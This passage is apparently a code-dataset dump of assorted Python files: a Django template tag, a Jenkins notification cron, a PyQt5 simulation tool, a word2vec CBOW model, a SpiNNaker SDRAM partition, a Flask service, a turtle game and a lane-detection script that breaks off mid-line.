'LightSalmon'\n elif 2 <= text <= 5:\n color = 'Red'\n elif text > 5:\n color = 'DarkRed'\n return format_html(\n '{}',\n color,\n text,\n 
)\n\n","sub_path":"dynamic-templates/task1/app/templatetags/app_tags.py","file_name":"app_tags.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"385842532","text":"import os\nimport django\nimport time\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"unb_libraries_status.settings\")\ndjango.setup()\n\nfrom notifications.models import Event, Notification\nfrom test_cases.models import JenkinsBuild, TestCase\nimport sys, importlib\n\nbuild_number = int(sys.argv[1])\nbuild = JenkinsBuild(build_number)\nbuild.evaluate_build()\n\nfailed_tests = TestCase.get_failed_tests()\nnotification_config = importlib.import_module('notifications.config.notification_config')\n\ncurrent_time = int(time.strftime('%H%M'))\nexclude_tests = []\nfor mute in notification_config.MUTE_TESTS:\n if 'start' in mute and (current_time < mute['start'] or current_time > mute['end']):\n continue\n\n exclude_tests += mute['tests']\n\nfailed_tests = [item for item in failed_tests if item not in exclude_tests]\n\nevent = Event.get_latest_event(failed_tests)\n\nif (len(failed_tests) > 0):\n if (event.notification_required()):\n Notification.send_notifications(event)\nelse:\n if (event != None and event.is_open()):\n if (event.notification_required()):\n Notification.send_notifications(event)\n event.close()\n","sub_path":"cron.py","file_name":"cron.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"7676055","text":"# cE_simulation_tool.py\n'''\n本文件是写的界面与后台仿真线程\n'''\nfrom defination_read import *\nfrom UI.simulation_exe_Form import Ui_Form # pyUIC自动生成的pyqt5界面\nfrom members.CN_member import *\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets # 一些必要的qt包\nimport sys # 线程挂起恢复必要的包\nimport os # 必要的包\n\n\ndef format_members_id_role(xml_dom: xml.dom.minidom.Document):\n \"\"\"\n 
格式化成员的id与角色,本函数仅用于获取仿真成员xml文件中的部分简单信息包含成员id,成员角色,各类成员的数量\n :param xml_dom: xml文件的dom对象\n :return: key为id与role的dict,成员总个数,primitive成员的数量,collective成员的数量,adviser成员的数量,monitor成员的数量\n \"\"\"\n root = xml_dom.documentElement # 获取dom对象的根\n # 初始化id_role字典\n id_role_dict = {\n 'id': list(),\n 'role': list()\n }\n member_info_labels = root.getElementsByTagName('memberInfo') # 获取memberInfo标签\n primitive_number = len(root.getElementsByTagName('primitiveInfo')) # 获取primitiveInfo标签\n collective_number = len(root.getElementsByTagName('collectiveInfo')) # 获取collectiveInfo标签\n adviser_number = len(root.getElementsByTagName('advisorInfo')) # 获取advisorInfo标签\n monitorMember_number = len(root.getElementsByTagName('monitorMemberInfo')) # 获取monitorMemberInfo标签\n for one_member_info_label in member_info_labels:\n id_role_dict['id'].append(one_member_info_label.getAttribute('成员ID'))\n id_role_dict['role'].append(one_member_info_label.getAttribute('成员类型'))\n return id_role_dict, len(\n member_info_labels), primitive_number, collective_number, adviser_number, monitorMember_number\n\n\nglobal_attribute_dict = dict() # 全局属性递推方法\nround_methods = dict() # 轮方法\n\nnet_p2p = pd.DataFrame() # 原子型成员网络\nnet_p2a = pd.DataFrame() # 原子型——建议者成员网络\nnet_p2m = pd.DataFrame() # 原子型——监控者成员网络\nnet_p2c = pd.DataFrame() # 原子型——集合型成员网络\nnet_c2m = pd.DataFrame() # 集合型——监控者成员网络\nnet_c2c = pd.DataFrame() # 集合型——集合型成员网络\n\nprimitives = None # 原子型单元集合\nadvisers = None # 建议者单元集合\nmonitorMembers = None # 监控者单元集合\ncollectives = None # 集合型单元集合\n\n\nclass uf_Form(QtWidgets.QWidget, Ui_Form):\n def __init__(self):\n super(uf_Form, self).__init__()\n self.setupUi(self)\n self.setFixedSize(self.width(), self.height())\n self.start_btn_icon = QtGui.QIcon(r'.\\UI\\播放按钮.ico')\n self.pause_btn_icon = QtGui.QIcon(r'.\\UI\\暂停.ico')\n stop_btn_icon = QtGui.QIcon(r'.\\UI\\停止.ico')\n self.start_or_pause_btn.setIcon(self.start_btn_icon)\n self.stop_btn.setIcon(stop_btn_icon)\n self.modify_dateEdit.setDate(QtCore.QDate.currentDate())\n 
self.members_filedialog_btn.clicked.connect(self.slot_btn_set_members_path)\n self.def_xml_filedialog_btn.clicked.connect(self.slot_btn_set_definition_path)\n self.record_filedialog_btn.clicked.connect(self.slot_btn_set_record_path)\n\n def slot_btn_set_definition_path(self):\n '''\n 读取仿真定义文件路径\n :return:\n '''\n try:\n xml_definition_path = QtWidgets.QFileDialog.getOpenFileName(self, \"选择仿真定义xml文件\", \"./\",\n \"XML Files (*.xml);;All Files (*)\")\n self.def_xml_path_edit.setText(xml_definition_path[0])\n definition_dom = read_xml(xml_definition_path[0])\n # 注册全局函数成员递推函数\n global global_attribute_dict, round_methods\n global_attribute_dict = register_global_attribute_method(definition_dom)\n round_methods = register_round_method(definition_dom)\n self.service_msg_log_text.append('Read definition from: ')\n self.service_msg_log_text.append(xml_definition_path[0])\n except:\n QtWidgets.QMessageBox.critical(self, \"错误\", \"仿真定义文件错误\")\n self.def_xml_path_edit.clear()\n self.service_msg_log_text.append('definition file error. 
')\n raise\n\n def slot_btn_set_members_path(self):\n '''\n 读取所有成员的路径的槽函数\n :return:\n '''\n try:\n xml_members_path = QtWidgets.QFileDialog.getOpenFileName(self, \"选择仿真成员xml文件\", \"./\",\n \"XML Files (*.xml);;All Files (*)\")\n self.members_xml_path_edit.setText(xml_members_path[0])\n # 根据这个路径来读取成员\n member_dom = read_xml(xml_members_path[0])\n # 服务信息更新显示\n self.service_msg_log_text.append('Read member from: ')\n self.service_msg_log_text.append(xml_members_path[0])\n # 解析成员\n global net_p2p, net_p2a, net_p2m, net_p2c, net_c2m, net_c2c\n net_p2p, net_p2a, net_p2m, net_p2c, net_c2m, net_c2c = net_work_read(member_dom)\n global primitives, advisers, monitorMembers, collectives\n primitives, advisers, monitorMembers, collectives = member_read(member_dom)\n id_role_dict, member_number, p_number, c_number, a_number, m_number = format_members_id_role(member_dom)\n self.reset_member_tableWidget(member_number, id_role_dict)\n self.primitive_num_edit.setText(str(p_number))\n self.adviser_num_edit.setText(str(a_number))\n self.monitor_num_edit.setText(str(m_number))\n self.collective_num_edit.setText(str(c_number))\n self.service_msg_log_text.append(\"Primitive:{}|Adviser:{}|Monitor:{}|Collective:{}\".format(\n p_number, a_number, m_number, c_number\n ))\n except:\n QtWidgets.QMessageBox.critical(self, \"错误\", \"成员生成文件错误\")\n self.members_xml_path_edit.clear()\n self.service_msg_log_text.append('member XML file error. 
')\n raise\n\n def reset_member_tableWidget(self, length, id_role_dict):\n self.member_tableWidget.setRowCount(length)\n item = self.member_tableWidget.horizontalHeaderItem(0)\n item.setText(QtCore.QCoreApplication.translate(\"Form\", \"Member\"))\n item = self.member_tableWidget.horizontalHeaderItem(1)\n item.setText(QtCore.QCoreApplication.translate(\"Form\", \"Role\"))\n self.member_tableWidget.setHorizontalHeaderItem(1, item)\n temp_arrow = 0\n for id, role in zip(id_role_dict['id'], id_role_dict['role']):\n id_item, role_item = QtWidgets.QTableWidgetItem(), QtWidgets.QTableWidgetItem()\n id_item.setText(QtCore.QCoreApplication.translate(\"Form\", id))\n role_item.setText(QtCore.QCoreApplication.translate(\"Form\", role))\n self.member_tableWidget.setItem(temp_arrow, 0, id_item)\n self.member_tableWidget.setItem(temp_arrow, 1, role_item)\n temp_arrow += 1\n\n def slot_btn_set_record_path(self):\n '''\n 设置仿真结果路径保存的槽函数\n :return:\n '''\n dir_record_path = QtWidgets.QFileDialog.getExistingDirectory(self, \"选择仿真记录文件夹\", os.getcwd())\n if dir_record_path == \"\":\n print('取消选择')\n return\n else:\n self.record_dir_path_edit.setText(dir_record_path)\n self.service_msg_log_text.append('Set record dictionary to: ')\n self.service_msg_log_text.append(dir_record_path)\n\n def start_check(self):\n if self.members_xml_path_edit.text() is \"\" or \\\n self.def_xml_path_edit.text() is \"\" or \\\n self.record_dir_path_edit.text() is \"\" or \\\n self.version_edit.text() is \"\" or\\\n self.generation_Edit.text() is \"\" or\\\n self.step_size_Edit.text() is \"\":\n return False\n else:\n return True\n\n\nif __name__ == '__main__':\n all_change_time = 2\n for chance_time in range(all_change_time):\n extend_path = input('请输入外部函数文件所在路径:')\n sys.path.append(extend_path)\n try:\n from aa__ import *\n\n print('外部函数包引用成功')\n break\n except:\n print('外部函数文件路径有误,您还有{}次机会'.format(all_change_time - chance_time - 1))\n if chance_time < all_change_time - 1:\n continue\n else:\n 
input('错误次数已达上限,请按回车键退出')\n exit(0)\n print(globals()['globalAttribute1'])\n print(globals()['A1']('new init', 1, 3))\n\n app = QtWidgets.QApplication(sys.argv)\n window = uf_Form()\n window.setWindowTitle('众智网络仿真执行工具软件')\n window.show()\n\n sys.exit(app.exec_())\n","sub_path":"simulation_tool.py","file_name":"simulation_tool.py","file_ext":"py","file_size_in_byte":9118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"399480425","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Sep 10 11:04:42 2018\n\n@author: Samuele Garda\n\"\"\"\n\ndef evaluate(eval_data,subs,simplifier,topn):\n \n#Initialize variables: \n potentialc = 0 \n potentialt = 0 \n precisionc = 0 \n precisiont = 0 \n recallt = 0\n \n eval_data = load_eval_data(eval_data)\n \n for idx,test_case in eval_data.iterrows():\n \n target = test_case['c_w']\n candidates = set(test_case['sub'])\n substitutions = simplifier.get_candidates(target, topn = topn)\n if target in substitutions: \n overlap = candidates.intersection(set(substitutions[target])) \n precisionc += len(overlap) \n if len(overlap)>0:\n potentialc += 1 \n precisiont += len(substitutions[target]) \n potentialt += 1 \n recallt += len(candidates) \n \n potential = float(potentialc)/float(potentialt) \n precision = float(precisionc)/float(precisiont) \n recall = float(precisionc)/float(recallt) \n fmean = 0.0 \n if precision==0.0 and recall==0.0: \n fmean = 0.0 \n else: \n fmean = 2*(precision*recall)/(precision+recall) \n \n #Return measures: \n return potential, precision, recall, fmean \n ","sub_path":"evaluation/test_eval_sub.py","file_name":"test_eval_sub.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"332148448","text":"# !/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nimport const\nimport numpy as np\nimport math\nimport tensorflow as tf\n\n\nclass 
Cbow(object):\n def __init__(self, corpus):\n self.corpus = corpus\n\n def test(self, word, k=10):\n Weight = tf.Variable(tf.random_normal([self.corpus.n_words, const.EMBEDDING_SIZE], -1.0, 1.0))\n inputs = tf.placeholder(tf.int32, [None])\n embed = tf.nn.embedding_lookup(Weight, inputs)\n\n # cosine\n test_embed = tf.placeholder(tf.float32, [None])\n test_input = tf.placeholder(tf.float32, [None])\n normed_embed = tf.nn.l2_normalize(test_embed, dim=0)\n normed_array = tf.nn.l2_normalize(test_input, dim=0)\n cosine_similarity = tf.reduce_sum(tf.multiply(normed_array, normed_embed))\n\n with tf.Session() as sess:\n tf.global_variables_initializer().run()\n # restore model\n tf.train.Saver().restore(sess, const.MODEL_PATH)\n\n vectors = sess.run(embed, feed_dict={inputs: range(self.corpus.n_words)})\n vocab = self.corpus.vocab\n idx = self.corpus.var_word(word)\n scores = []\n for i in range(len(vocab)):\n if vocab[i] == word or vocab[i] == const.U_TOKEN:\n continue\n vec_a = vectors[i].reshape([-1])\n vec_b = vectors[idx].reshape([-1])\n cosine_sim = sess.run(cosine_similarity, feed_dict={test_embed: vec_a, test_input: vec_b})\n scores.append([vocab[i], cosine_sim]) # calculates cosine similarity\n return sorted(scores, key=lambda x: x[1], reverse=True)[:k]\n\n def train(self):\n Weight = tf.Variable(tf.truncated_normal([self.corpus.n_words, const.EMBEDDING_SIZE],\n stddev=1.0 / math.sqrt(const.EMBEDDING_SIZE)))\n bias = tf.Variable(tf.zeros([self.corpus.n_words]))\n\n inputs = tf.placeholder(tf.int32, [const.BATCH_SIZE, const.WIN_SIZE])\n outputs = tf.placeholder(tf.int32, [const.BATCH_SIZE, 1])\n embed = tf.nn.embedding_lookup(tf.random_normal([self.corpus.n_words, const.EMBEDDING_SIZE], -1.0, 1.0), inputs)\n\n embed_sum = tf.reduce_sum(embed, 1)\n loss = tf.reduce_mean(\n tf.nn.sampled_softmax_loss(Weight, bias, outputs, embed_sum, 3, self.corpus.n_words)) # negative sampling\n optimizer = tf.train.AdamOptimizer(learning_rate=const.LR_RATE).minimize(loss)\n\n 
saver = tf.train.Saver()\n\n losses = []\n with tf.Session() as sess:\n tf.global_variables_initializer().run()\n\n for epoch in range(const.EPOCH):\n inps, targets = self.corpus.batch_data()\n _, _loss = sess.run([optimizer, loss], feed_dict={inputs: inps, outputs: targets})\n\n losses.append(_loss)\n if epoch % 100 == 0:\n print('epoch, ', epoch, 'mean loss', np.mean(losses))\n losses = []\n\n # save model\n saver.save(sess, const.MODEL_PATH)\n","sub_path":"nlp/embedding/word2vec/tf/cbow_neg.py","file_name":"cbow_neg.py","file_ext":"py","file_size_in_byte":3065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"215990591","text":"def checkio(number):\n\n num = str(number)\n result = None\n for i in range(len(num)):\n if int(num[i]) == 0:\n continue\n if i == 0:\n result = int(num[i])\n else:\n result *= int(num[i])\n\n return result\n\n#These \"asserts\" using only for self-checking and not necessary for auto-testing\nif __name__ == '__main__':\n assert checkio(123405) == 120\n assert checkio(999) == 729\n assert checkio(1000) == 1\n assert checkio(1111) == 1\n","sub_path":"checkio/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"9216504","text":"# Copyright (c) 2019 The University of Manchester\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nfrom spinn_utilities.overrides import 
overrides\nfrom pacman.exceptions import (\n PacmanConfigurationException, PartitionMissingEdgesException)\nfrom pacman.model.graphs import AbstractMultiplePartition\nfrom pacman.model.graphs.machine import (\n AbstractSDRAMPartition, SDRAMMachineEdge)\n\n\nclass SourceSegmentedSDRAMMachinePartition(\n AbstractMultiplePartition, AbstractSDRAMPartition):\n \"\"\"\n An SDRAM partition that gives each edge its own slice of memory from a\n contiguous block. The edges all have the same destination vertex.\n \"\"\"\n __slots__ = [\n \"_sdram_base_address\",\n ]\n\n def __init__(self, identifier, pre_vertices):\n \"\"\"\n :param str identifier: The identifier of the partition\n :param str label: A label of the partition\n :param iterable(~pacman.model.graphs.AbstractVertex) pre_vertices:\n The vertices that an edge in this partition may originate at\n \"\"\"\n super().__init__(\n pre_vertices, identifier, allowed_edge_types=SDRAMMachineEdge)\n self._sdram_base_address = None\n\n def total_sdram_requirements(self):\n \"\"\"\n :rtype: int\n \"\"\"\n return sum(edge.sdram_size for edge in self.edges)\n\n @property\n def sdram_base_address(self):\n \"\"\"\n :rtype: int\n \"\"\"\n return self._sdram_base_address\n\n @overrides(AbstractMultiplePartition.add_edge)\n def add_edge(self, edge):\n # check\n if len(self._destinations):\n if edge.post_vertex not in self._destinations:\n raise PacmanConfigurationException(\n f\"The {self.__class__.__name__} can only support \"\n \"1 destination vertex\")\n try:\n if len(self._pre_vertices[edge.pre_vertex]) != 0:\n raise PacmanConfigurationException(\n f\"The {self.__class__.__name__} only supports 1 edge from \"\n \"a given pre vertex.\")\n except KeyError as ex:\n raise PacmanConfigurationException(\n \"Edge pre_vertex is not a Partition. 
pre vertex\") from ex\n # add\n super().add_edge(edge)\n\n @sdram_base_address.setter\n def sdram_base_address(self, new_value):\n if len(self.pre_vertices) != len(self.edges):\n raise PartitionMissingEdgesException(\n f\"There are {len(self.pre_vertices)} pre vertices \"\n f\"but only {len(self.edges)} edges\")\n\n self._sdram_base_address = new_value\n\n for pre_vertex in self._pre_vertices.keys():\n # allocate for the pre_vertex\n edge = self._pre_vertices[pre_vertex].peek()\n edge.sdram_base_address = new_value\n new_value += edge.sdram_size\n\n @overrides(AbstractSDRAMPartition.get_sdram_base_address_for)\n def get_sdram_base_address_for(self, vertex):\n if self._sdram_base_address is None:\n return None\n if vertex in self._pre_vertices:\n edge = self._pre_vertices[vertex].peek()\n return edge.sdram_base_address\n else:\n return self._sdram_base_address\n\n @overrides(AbstractSDRAMPartition.get_sdram_size_of_region_for)\n def get_sdram_size_of_region_for(self, vertex):\n if vertex in self._pre_vertices:\n edge = self._pre_vertices[vertex].peek()\n return edge.sdram_size\n else:\n return self.total_sdram_requirements()\n","sub_path":"pacman/model/graphs/machine/source_segmented_sdram_machine_partition.py","file_name":"source_segmented_sdram_machine_partition.py","file_ext":"py","file_size_in_byte":4060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"562056987","text":"from app.main import db\nfrom app.main.models.objective_questions import ObjectiveQuestions\nfrom app.main.models.submission_objective import SubmissionObjective\nfrom flask import jsonify\n\ndef take_test(data):\n \"\"\"[summary]\n \n Returns:\n [type]: [description]\n \"\"\"\n student_id = int(data[\"student_id\"])\n quiz_test_id = data[\"test_id\"]\n query = db.session.query(ObjectiveQuestions).filter_by(quiz_test_id=quiz_test_id)\n items = []\n for i in query:\n 
items.append({\"student_id\":student_id,\"quiz_test_id\":i.quiz_test_id,\"question_id\":i.question_id,\"marks\":i.marks})\n for i in range(len(items)):\n new_submission = SubmissionObjective(\n student_id = items[i]['student_id'],\n question_id = items[i]['question_id'],\n quiz_test_id = items[i]['quiz_test_id'],\n marks = items[i]['marks']\n )\n db.session.add(new_submission)\n db.session.commit()\n response_object = jsonify({\"response\": \"successfully added\"})\n return response_object, 200","sub_path":"src/server/app/main/services/take_test.py","file_name":"take_test.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"435824717","text":"import random\nimport turtle as t\nfrom turtle import Turtle\n\ndef turn_right(): #오른쪽 화살키\n t.setheading(0)\n t.forward(10)\n\ndef turn_up(): #위쪽 화살키\n t.setheading(90)\n t.forward(10)\n\ndef turn_left(): #왼쪽 화살키\n t.setheading(180)\n t.forward(10)\n\ndef turn_down(): #아래쪽 화살키\n t.setheading(270)\n t.forward(10)\n\ndef play():\n t.forward(10)\n te.forward(9)\n #적거북이가 주인공을 쫓아감\n ang=te.towards(t.pos())\n te.setheading(ang)\n #주인공 거북이가 먹이에 닿으면 먹이가 랜덤하게 이동\n if t.distance(tf) < 12:\n x = random.randint(-230,230)\n y = random.randint(-230,230)\n tf.goto(x,y)\n if t.distance(te) < 12:\n t.ontimer(play, 100) #0.1초\n\n#메인영역\nt.setup(500,500) #너비,높이\nt.title(\"달려라 거북이\")\nt.speed(0)\nt.up()\nt.color('white')\nt.bgcolor('black')\nt.shape('turtle')\n\n#적 거북이\nte = t.Turtle() #Turtle() 클래스에서 te인스턴스 생성\nte.shape('turtle')\nte.color('yellow')\nte.speed(0)\nte.up()\nte.goto(0,200)\n\n#먹이\ntf = t.Turtle()\ntf.shape('circle')\ntf.color('blue')\ntf.shapesize(0.7)\ntf.up()\ntf.goto(0,-200)\n\nt.onkeypress(turn_right,\"Right\")\nt.onkeypress(turn_left,\"Left\")\nt.onkeypress(turn_up,\"Up\")\nt.onkeypress(turn_down,\"Down\")\nt.listen() #키보드의 동작을 
기다림\nplay()\n\nt.mainloop()","sub_path":"run_turtle/run_turtle.py","file_name":"run_turtle.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"516437460","text":"\"\"\"============================================================================\nPART 05. curved_lanes.py\n============================================================================\"\"\"\n\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sys\n\n\"\"\"============================================================================\nPROCEDURE:\n find_curvature\nPARAMETERS:\n img, a perspective-transformed binary image\nPURPOSE:\n calculate best-fit polynomials for left and right lanes as detected from\n the binary image given\nPRODUCES:\n fit_polynomial, a tuple holding polynomials for left and right lanes as\n well as 0 or 1 to indicate whether window center points were used.\n e.g. when center points were used : (ctr_left_fit, ctr_right_fit, 1)\n when nonzero pixels were used: (left_fit, right_fit, 0)\n============================================================================\"\"\"\ndef find_curvature(img):\n\n # Histogram can help us determine the intensity of white pixels(255)\n # - As pixel values are summed up vertically, regions where lanes lie \n # will have significantly higher peaks (x-axis:width, y-axis:sum)\n # - Mostly two peaks; one on the left and one the right\n # - Summing up values in the lower half of the image\n histogram = np.sum(img[img.shape[0]//2:,:], axis=0)\n\n # Create an output image for result visualization\n # img.shape = (670, 1280); out_img.shape = (670, 1280, 3)\n # out_img = np.dstack((img, img, img))*255\n\n # Calculate the midpoint of width of histogram\n midpoint = np.int(histogram.shape[0] // 2)\n\n # Calculate the max on the left and right side of the midpoint\n # - this value will be the x value of the peak point\n left_peak_x = 
np.argmax(histogram[:midpoint])\n right_peak_x = np.argmax(histogram[midpoint:]) + midpoint\n\n # - distance between them should be at least 700 and at most 850 pixels\n # to ensure that they are lanes (if not, set arbitrary x value)\n if ((right_peak_x - left_peak_x) < 700 or \n (right_peak_x - left_peak_x) > 850):\n left_peak_x = 275\n right_peak_x = 1100\n print(\"Lane Distance reconfigured.\")\n\n # Set the number of sliding windows\n window_num = 9\n\n # Set the window height\n window_height = np.int(img.shape[0] // window_num)\n\n # Identify x and y coordinates of all nonzero pixels in the image\n nonzero = img.nonzero() # nonozero = ((array), (array))\n nonzero_x = np.array(nonzero[1]) # x coordinates of nonzero pixels\n nonzero_y = np.array(nonzero[0]) # y coordinates of nonzero pixels\n\n # Current positions to be updated for each sliding window\n # First begin at the x value of the histogram peak point\n left_x_current = left_peak_x\n right_x_current = right_peak_x\n\n # Set the width of the windows +/- margin\n margin = 60\n\n # Set minimum number of pixels found to recenter window\n min_pix = 40\n\n # Count the number of times windows have been recentered\n num_win_moved_left = 0\n num_win_moved_right = 0\n\n # Create empty lists to receive left and right lane pixel indices\n left_lane_index = []\n right_lane_index = []\n\n # Create empty ndarray to store window center points\n win_ctr_x_left = np.array([]) # x val of center point on left\n win_ctr_x_right = np.array([]) # x val of center point on right\n win_ctr_y = np.array([]) # y val of center point (same for both)\n\n # For each sliding window\n for window in range(window_num):\n\n # Identify window boundaries in x and y (for right and left side)\n win_y_low = img.shape[0] - (window + 1) * window_height\n win_y_high = img.shape[0] - window * window_height\n \n win_x_left_low = left_x_current - margin\n win_x_left_high = left_x_current + margin\n \n win_x_right_low = right_x_current - margin\n 
win_x_right_high = right_x_current + margin\n\n # Draw the windows on the visualization image\n # cv2.rectangle(out_img, (win_x_left_low, win_y_low),\n # (win_x_left_high, win_y_high),\n # (0,255,0), 2)\n\n # cv2.rectangle(out_img, (win_x_right_low, win_y_low), \n # (win_x_right_high, win_y_high),\n # (0,255,0), 2) \n\n # (win_x_left_low, win_y_low) \n # OR\n # (win_x_right_low, win_y_low)\n # o --------\n # | |\n # -------- o \n # (win_x_left_high, win_y_high)\n # OR\n # (win_x_right_high, win_y_high)\n\n # Identify indices of the nonzero pixels within the current window\n good_left_inds = ((nonzero_y >= win_y_low) &\n (nonzero_y < win_y_high) & \n (nonzero_x >= win_x_left_low) & \n (nonzero_x < win_x_left_high)).nonzero()[0]\n \n good_right_inds = ((nonzero_y >= win_y_low) & \n (nonzero_y < win_y_high) & \n (nonzero_x >= win_x_right_low) & \n (nonzero_x < win_x_right_high)).nonzero()[0]\n\n # Add these indices to the lists\n left_lane_index.append(good_left_inds)\n right_lane_index.append(good_right_inds)\n\n # If exceeds min_pix, recenter next window on their mean x position\n # - nonzero_x[good_left_inds] = all x values of nonzero pixels \n # in the current window on the left\n if len(good_left_inds) > min_pix:\n left_x_current = np.int(np.mean(nonzero_x[good_left_inds]))\n num_win_moved_left += 1\n\n if len(good_right_inds) > min_pix: \n right_x_current = np.int(np.mean(nonzero_x[good_right_inds]))\n num_win_moved_right += 1\n \n # Append the center points to the existing array\n win_ctr_x_left = np.append( win_ctr_x_left,\n (win_x_left_high + win_x_left_low)//2 ) \n \n win_ctr_x_right = np.append( win_ctr_x_right,\n (win_x_right_high + win_x_right_low)//2 )\n\n win_ctr_y = np.append( win_ctr_y,\n (win_y_high + win_y_low)//2 ) \n\n # Concatenate the arrays of indices into one large array\n left_lane_index = np.concatenate(left_lane_index)\n right_lane_index = np.concatenate(right_lane_index)\n\n # All the xy-coordinates of nonzero pixels within all windows\n # 
- these points will later be colored red and blue\n left_nz_x = nonzero_x[left_lane_index]\n left_nz_y = nonzero_y[left_lane_index] \n\n right_nz_x = nonzero_x[right_lane_index]\n right_nz_y = nonzero_y[right_lane_index]\n \n # =================================================\n # This part is specifically for cases when the number of pixels within \n # windows are not high enough to accurately produce a best fit.\n # In other words, if the majority of windows do not recenter, which\n # can be determined by num_win_moved_right/left, this suggests that \n # there are not enough significant pixels around to determine the \n # general direction of a lane. Hence, I decided that it is safer to\n # rely on the best-fit line based on center points of all windows.\n\n # Compute a second-order polynomial for best-fit line \n # through the window center points\n if num_win_moved_left <= 4 or num_win_moved_right <= 4:\n ctr_left_fit = np.polyfit(win_ctr_y, win_ctr_x_left, 2)\n ctr_right_fit = np.polyfit(win_ctr_y, win_ctr_x_right, 2)\n \n # Generate x and y values for plotting\n # - an array = [0, 1, 2, ..., 669]\n # plot_y2 = np.linspace(0, img.shape[0]-1, img.shape[0])\n \n # - all x coordinates of the best-fit line calculated above\n # left_fit_x2 = (ctr_left_fit[0] * plot_y2**2 + \n # ctr_left_fit[1] * plot_y2 + \n # ctr_left_fit[2])\n\n # right_fit_x2 = (ctr_right_fit[0] * plot_y2**2 + \n # ctr_right_fit[1] * plot_y2 + \n # ctr_right_fit[2])\n\n # Visualize all nonzero pixels outside windows\n # out_img[nonzero_y, nonzero_x] = [255, 255, 255] # white : others\n \n # Visualize all nonzero pixels inside windows\n # out_img[left_nz_y, left_nz_x] = [255, 0, 0] # red: left\n # out_img[right_nz_y, right_nz_x] = [0, 0, 255] # blue: right\n\n # plt.imshow(out_img)\n \n # Plot the best-fit line for left and right lane\n # plt.plot(left_fit_x2, plot_y2, color='magenta')\n # plt.plot(right_fit_x2, plot_y2, color='magenta')\n\n # Set x and y axis boundaries\n # plt.xlim(0, 
img.shape[1])\n # plt.ylim(img.shape[0], 0)\n\n # plt.show()\n\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()\n\n fit_polynomial = (ctr_left_fit, ctr_right_fit, 1)\n print(\"best-fit performed using center-points.\")\n\n return fit_polynomial\n\n # =================================================\n # Otherwise, \n else:\n # Compute a second-order polynomial for best-fit line \n # through the nonzero pixels found above \n left_fit = np.polyfit(left_nz_y, left_nz_x, 2)\n right_fit = np.polyfit(right_nz_y, right_nz_x, 2)\n\n # Generate x and y values for plotting\n # - an array = [0, 1, 2, ..., 669]\n # plot_y = np.linspace(0, img.shape[0]-1, img.shape[0]) \n\n # - all x coordinates of the best-fit line calculated above\n # left_fit_x = ( left_fit[0] * plot_y**2 + \n # left_fit[1] * plot_y + \n # left_fit[2])\n # right_fit_x = ( right_fit[0]* plot_y**2 + \n # right_fit[1]* plot_y + \n # right_fit[2])\n\n # Visualize all nonzero pixels outside windows\n # out_img[nonzero_y, nonzero_x] = [255, 255, 255] # white : others\n\n # Visualize all nonzero pixels inside windows\n # out_img[left_nz_y, left_nz_x] = [255, 0, 0] # red: left\n # out_img[right_nz_y, right_nz_x] = [0, 0, 255] # blue: right\n\n # plt.imshow(out_img)\n\n # Plot the best-fit line for left and right lane\n # plt.plot(left_fit_x, plot_y, color='yellow')\n # plt.plot(right_fit_x, plot_y, color='yellow')\n\n # Set x and y axis boundaries\n # plt.xlim(0, img.shape[1])\n # plt.ylim(img.shape[0], 0)\n\n # plt.show()\n\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()\n\n fit_polynomial = (left_fit, right_fit, 0)\n\n return fit_polynomial\n\n\"\"\"============================================================================\nPROCEDURE:\n find_curved_lanes\nPARAMETERS:\n img, \n polynomial,\nPURPOSE:\n uses the best-fit polynomial from find_curvature() to find another \n best-fit line based on nonzero pixels within margins and generate plot data\n points to draw the curved lanes\nPRODUCES:\n - plot_data, a tuple that 
contains plotting points for y values, left-fit \n x values, and right-fit x values. (ploty, left_fitx, right_fitx)\n - fit_data, a tuple that contains polynomial information for left and right\n best-fit lines. (left_fit, right_fit)\n============================================================================\"\"\"\ndef find_curved_lanes(img, polynomial):\n\n # Set the lane margin\n margin = 100\n\n # Identify x and y coordinates of all nonzero pixels in the image\n nonzero = img.nonzero() # nonozero = ((array), (array))\n nonzero_x = np.array(nonzero[1]) # x coordinates of nonzero pixels\n nonzero_y = np.array(nonzero[0]) # y coordinates of nonzero pixels\n\n # Attain best-fit polynomial information from the given parameter\n left_fit, right_fit, used_cp = polynomial\n\n # Determine whether the nonzero pixels lie within the lane margin\n # - array of booleans\n left_lane_inds = ((nonzero_x > (left_fit[0] * (nonzero_y**2) + \n left_fit[1] * nonzero_y + \n left_fit[2] - margin)) & \n (nonzero_x < (left_fit[0] * (nonzero_y**2) + \n left_fit[1] * nonzero_y + \n left_fit[2] + margin)) ) \n\n right_lane_inds = ((nonzero_x > (right_fit[0] * (nonzero_y**2) + \n 